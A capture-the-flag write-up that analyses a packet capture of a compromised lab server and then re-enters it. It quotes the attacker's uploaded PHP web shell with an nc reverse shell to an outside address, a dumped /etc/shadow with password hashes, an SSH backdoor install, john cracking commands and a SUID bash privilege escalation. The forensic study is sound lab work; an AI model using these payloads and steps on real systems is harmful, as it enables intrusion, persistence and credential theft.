OverPass2 - HackMD

# OverPass2 ###### tags: `vulnerableMachine` `investigation` [TOC] Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. Can you work out how the attacker got in, and hack your way back into Overpass' production server? --- Attacker 192.168.170.145 Victim 192.168.170.159 # Protocol Hierarchy Static ![](https://i.imgur.com/EJLWYXN.png) # Export HTTP packets ![](https://i.imgur.com/pud1Fim.png) # Upload the web shell ``` -----------------------------1809049028579987031515260006 Content-Disposition: form-data; name="fileToUpload"; filename="payload.php" Content-Type: application/x-php <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> -----------------------------1809049028579987031515260006 Content-Disposition: form-data; name="submit" Upload File -----------------------------1809049028579987031515260006-- ``` upload.php ``` <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> ``` Attacker -> Initial Access --- transport layer -> data -> copy -> printable Text (TCP port 80) tcp.port == 80 -> investigate packet bit (command) ``` uid=33(www-data) gid=33(www-data) groups=33(www-data) # we could know he login in as www-data identity www-data@overpass-production:/var/www/html/development/uploads$ -rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass -rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php www-data@overpass-production:/var/www/html/development/uploads$ ``` # stabilize shell ``` python3 -c 'import pty;pty.spawn("/bin/bash")' ``` -> interactive shell ``` sudo cat /etc/shadow root:*:18295:0:99999:7::: daemon:*:18295:0:99999:7::: bin:*:18295:0:99999:7::: sys:*:18295:0:99999:7::: sync:*:18295:0:99999:7::: games:*:18295:0:99999:7::: man:*:18295:0:99999:7::: lp:*:18295:0:99999:7::: mail:*:18295:0:99999:7::: news:*:18295:0:99999:7::: uucp:*:18295:0:99999:7::: proxy:*:18295:0:99999:7::: www-data:*:18295:0:99999:7::: backup:*:18295:0:99999:7::: list:*:18295:0:99999:7::: irc:*:18295:0:99999:7::: gnats:*:18295:0:99999:7::: nobody:*:18295:0:99999:7::: systemd-network:*:18295:0:99999:7::: systemd-resolve:*:18295:0:99999:7::: syslog:*:18295:0:99999:7::: messagebus:*:18295:0:99999:7::: _apt:*:18295:0:99999:7::: lxd:*:18295:0:99999:7::: uuidd:*:18295:0:99999:7::: dnsmasq:*:18295:0:99999:7::: landscape:*:18295:0:99999:7::: pollinate:*:18295:0:99999:7::: sshd:*:18464:0:99999:7::: james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7::: szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7::: bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7::: muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7::: ``` # John crack ![](https://i.imgur.com/wsDNmve.png) ``` secret12 (bee) abcd123 (szymex) 1qaz2wsx (muirland) secuirty3 (paradox) ``` # Persistence ``` git clone https://github.com/NinjaJc01/ssh-backdoor ``` He opened a back door on port 2222 ``` Cloning into 'ssh-backdoor'... cd ssh-backdoor james@overpass-production:~/ssh-backdoor$ chmod +x backdoor ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed ``` # Analysis the backdoor program https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go ![](https://i.imgur.com/J5BZxpT.png) encrypt type :sha512 protocol :ssh ssh verify ``` func verifyPass(hash, salt, password string) bool { resultHash := hashPassword(password, salt) return resultHash == hash } ``` -> hashPassword(password, salt) we have to know password and salt ``` func passwordHandler(_ ssh.Context, password string) bool { return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password) } ``` This's a salt ``` 1c362db832f3f864c8c2fe05f2002a05 ``` Default Hash ``` var hash string = "bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3" ``` Password could be find from the PACP ``` 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed ``` # Hack back ## Crack (hash+salt) ``` john --wordlist=../../wordlists/rockyou.txt --format='dynamic=sha512($p.$s)' hackerHash.txt ``` backdoor (port 2222 ) password:november16 --- Hash+Salt ``` 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed$1c362db832f3f864c8c2fe05f2002a05 ``` ![](https://i.imgur.com/KE45SME.png) ![](https://i.imgur.com/27pVfh7.png) ## SSH login https://blog.alanwei.com/blog/2022/01/24/ssh-no-matching-host-key-type-found/ ``` ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa james@10.10.214.245 -p 2222 ``` ![](https://i.imgur.com/2hYpXXL.png) ``` find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000 2>/dev/null ``` ![](https://i.imgur.com/4iDAauo.png) ``` ./.suid_bash -p ``` -p (privileged) ![](https://i.imgur.com/DB74Pq4.png)